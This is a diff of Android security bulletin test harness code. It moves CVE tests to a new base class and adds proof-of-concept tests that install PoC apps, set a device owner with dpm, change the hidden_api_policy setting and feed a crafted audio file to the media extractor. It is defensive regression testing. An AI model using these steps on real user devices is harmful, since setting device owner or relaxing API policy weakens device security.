--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39796.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39796.java
@@ -20,14 +20,14 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39796 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39796 extends NonRootSecurityTestCase {
static final int USER_ID = 0;
static final String TEST_PKG = "android.security.cts.CVE_2021_39796";
static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39797.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39797.java
index ee835f50c93..1707ce92429 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39797.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39797.java
@@ -20,13 +20,13 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39797 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39797 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 209607104)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39804.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39804.java
index 1c1b246b0e5..0053fc6d219 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39804.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39804.java
@@ -20,18 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
-import com.android.tradefed.device.ITestDevice;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.After;
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
import java.util.Arrays;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39804 extends SecurityTestCase {
+public class CVE_2021_39804 extends NonRootSecurityTestCase {
/**
* b/215002587
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java
new file mode 100644
index 00000000000..f1eaad2edf7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39808.java
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39808 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 209966086)
+ @Test
+ public void testPocCVE_2021_39808() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2021_39808";
+
+ ITestDevice device = getDevice();
+
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ installPackage("CVE-2021-39808.apk");
+ runDeviceTests(testPkg, testPkg + "." + "DeviceTest","testService");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39810.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39810.java
index f9520824b26..9745336f8aa 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39810.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39810.java
@@ -21,14 +21,14 @@ import static org.junit.Assume.assumeNoException;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39810 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39810 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 212610736)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20004.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20004.java
index df8701c9e67..ec4d1977c01 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20004.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20004.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -26,7 +26,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20004 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20004 extends NonRootSecurityTestCase {
final static String TEST_PKG = "android.security.cts.CVE_2022_20004_test";
final static String PROVIDER_PKG = "android.security.cts.CVE_2022_20004_provider";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20007.java
index 47ea7ca8a47..abc94f5837c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20007.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20007.java
@@ -20,7 +20,7 @@ import static org.junit.Assume.assumeNoException;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -28,7 +28,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20007 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20007 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 211481342)
@Test
@@ -37,10 +37,12 @@ public class CVE_2022_20007 extends StsExtraBusinessLogicHostTestBase {
final String testClass = testPkg + "." + "DeviceTest";
final String testApp = "CVE-2022-20007.apk";
final String testAttackerApp = "CVE-2022-20007-Attacker.apk";
+ final String testSecondApp = "CVE-2022-20007-Second.apk";
ITestDevice device = getDevice();
try {
installPackage(testApp);
installPackage(testAttackerApp);
+ installPackage(testSecondApp);
AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20115.java
index a8256d6bef0..e83f090e94d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20115.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20115.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -27,7 +27,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20115 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20115 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2022_20115";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2022-20115.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20123.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20123.java
index 8fbf4435029..baa87075b75 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20123.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20123.java
@@ -20,6 +20,7 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
@@ -28,7 +29,7 @@ import org.junit.runner.RunWith;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20123 extends SecurityTestCase {
+public class CVE_2022_20123 extends NonRootSecurityTestCase {
/**
* b/221852424
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20127.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20127.java
index c94380457de..91f8e666ab6 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20127.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20127.java
@@ -18,6 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -25,7 +26,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20127 extends SecurityTestCase {
+public class CVE_2022_20127 extends NonRootSecurityTestCase {
/**
* b/221862119
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20131.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20131.java
index 08b28b63724..1aeaa1d80fd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20131.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20131.java
@@ -22,15 +22,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20131 extends SecurityTestCase {
+public class CVE_2022_20131 extends NonRootSecurityTestCase {
/**
* b/221856662
* Vulnerability Behaviour: SIGSEGV in self
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20138.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20138.java
index 45c6fb137fc..9e5e7eb94b4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20138.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20138.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -26,7 +26,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20138 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20138 extends NonRootSecurityTestCase {
static final String TEST_APP = "CVE-2022-20138.apk";
static final String TEST_PKG = "android.security.cts.CVE_2022_20138";
static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20147.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20147.java
index 41a727f857e..5b1d38ca53f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20147.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20147.java
@@ -22,15 +22,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20147 extends SecurityTestCase {
+public class CVE_2022_20147 extends NonRootSecurityTestCase {
/**
* b/221216105
* Vulnerability Behaviour: SIGSEGV in self
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20197.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20197.java
new file mode 100644
index 00000000000..3d31cee17c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20197.java
@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20197 extends NonRootSecurityTestCase {
+ private static final String TEST_PKG = "android.security.cts.CVE_2022_20197";
+
+ @AsbSecurityTest(cveBugId = 208279300)
+ @Test
+ public void testPocCVE_2022_20197() {
+ ITestDevice device = null;
+ boolean isPolicyPresent = true;
+ boolean isHiddenApiEnabled = true;
+ String status = "";
+ try {
+ device = getDevice();
+ installPackage("CVE-2022-20197.apk");
+
+ status = AdbUtils.runCommandLine("settings get global hidden_api_policy", device);
+ if (status.toLowerCase().contains("null")) {
+ isPolicyPresent = false;
+ } else if (!status.toLowerCase().contains("1")) {
+ isHiddenApiEnabled = false;
+ }
+ if (!isPolicyPresent || !isHiddenApiEnabled) {
+ AdbUtils.runCommandLine("settings put global hidden_api_policy 1", device);
+ }
+ runDeviceTests(TEST_PKG, TEST_PKG + ".DeviceTest", "testParcel");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ if (!isPolicyPresent) {
+ AdbUtils.runCommandLine("settings delete global hidden_api_policy", device);
+ } else if (!isHiddenApiEnabled) {
+ AdbUtils.runCommandLine("settings put global hidden_api_policy " + status,
+ device);
+ }
+ } catch (Exception e) {
+ // ignore all exceptions.
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20223.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20223.java
index f593f204bd6..18d4cdd6f55 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20223.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20223.java
@@ -21,7 +21,7 @@ import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -29,7 +29,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20223 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20223 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 223578534)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20230.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20230.java
index 1886a4af4ac..59e7631b287 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20230.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20230.java
@@ -20,7 +20,7 @@ import static org.junit.Assume.assumeNoException;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -28,7 +28,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20230 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20230 extends NonRootSecurityTestCase {
public static final int USER_ID = 0;
static final String TEST_APP = "CVE-2022-20230.apk";
static final String TEST_PKG = "android.security.cts.CVE_2022_20230";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20347.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20347.java
index de245bb06da..8087e692b5f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20347.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20347.java
@@ -20,7 +20,7 @@ import static org.junit.Assume.assumeNoException;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -28,7 +28,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2022_20347 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2022_20347 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 228450811)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20348.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20348.java
new file mode 100644
index 00000000000..df33a31144d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20348.java
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20348 extends NonRootSecurityTestCase {
+ static final String TEST_PKG = "android.security.cts.CVE_2022_20348";
+ public static final String TEST_DEVICE_ADMIN_RECEIVER = ".PocDeviceAdminReceiver";
+
+ @AsbSecurityTest(cveBugId = 228315529)
+ @Test
+ public void testPocCVE_2022_20348() throws Exception {
+ try {
+ ITestDevice device = getDevice();
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ /* Install the test application */
+ installPackage("CVE-2022-20348.apk");
+
+ /* Set Device Admin Component */
+ AdbUtils.runCommandLine(
+ "dpm set-device-owner '" + TEST_PKG + "/" + TEST_DEVICE_ADMIN_RECEIVER + "'",
+ device);
+
+ /* Run the test "testWifiScanningDisallowed" */
+ runDeviceTests(TEST_PKG, TEST_PKG + ".DeviceTest", "testWifiScanningDisallowed");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20349.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20349.java
new file mode 100644
index 00000000000..f8dcc48de61
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20349.java
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20349 extends NonRootSecurityTestCase {
+ static final String TEST_PKG = "android.security.cts.CVE_2022_20349";
+ public static final String TEST_DEVICE_ADMIN_RECEIVER = ".PocDeviceAdminReceiver";
+
+ @AsbSecurityTest(cveBugId = 228315522)
+ @Test
+ public void testPocCVE_2022_20349() throws Exception {
+ try {
+ ITestDevice device = getDevice();
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ /* Install the test application */
+ installPackage("CVE-2022-20349.apk");
+
+ /* Set Device Admin Component */
+ AdbUtils.runCommandLine(
+ "dpm set-device-owner '" + TEST_PKG + "/" + TEST_DEVICE_ADMIN_RECEIVER + "'",
+ device);
+
+ /* Run the test "testBluetoothScanningDisallowed" */
+ runDeviceTests(TEST_PKG, TEST_PKG + ".DeviceTest", "testBluetoothScanningDisallowed");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20353.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20353.java
new file mode 100644
index 00000000000..12bb187b47f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20353.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20353 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 221041256)
+ @Test
+ public void testPocCVE_2022_20353() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2022_20353";
+ ITestDevice device = getDevice();
+
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ // to generate NOTICE.html if not already present
+ AdbUtils.runCommandLine("am start -a android.settings.LICENSE", device);
+
+ installPackage("CVE-2022-20353.apk");
+
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testDefaultRingtonePreference");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_22082.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_22082.java
new file mode 100644
index 00000000000..a0200f17840
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_22082.java
@@ -0,0 +1,50 @@
+/**
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import static org.junit.Assume.*;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_22082 extends NonRootSecurityTestCase {
+
+ /**
+ * CVE-2022-22082
+ */
+ @AsbSecurityTest(cveBugId = 223211217)
+ @Test
+ public void testPocCVE_2022_22082() throws Exception {
+ /*
+ * Non StageFright test.
+ */
+ safeReboot();
+ AdbUtils.pushResource("/cve_2022_22082.dsf", "/sdcard/cve_2022_22082.dsf", getDevice());
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runCommandLine(
+ "am start -a android.intent.action.VIEW -t audio/dsf -d"
+ + " file:///sdcard/cve_2022_22082.dsf",
+ getDevice());
+ Thread.sleep(10000);
+ AdbUtils.assertNoCrashes(getDevice(), "media.extractor");
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideMainlineModuleDetector.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideMainlineModuleDetector.java
deleted file mode 100644
index 1d57cb6a468..00000000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideMainlineModuleDetector.java
+++ /dev/null
@@ -1,60 +0,0 @@
-/*
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
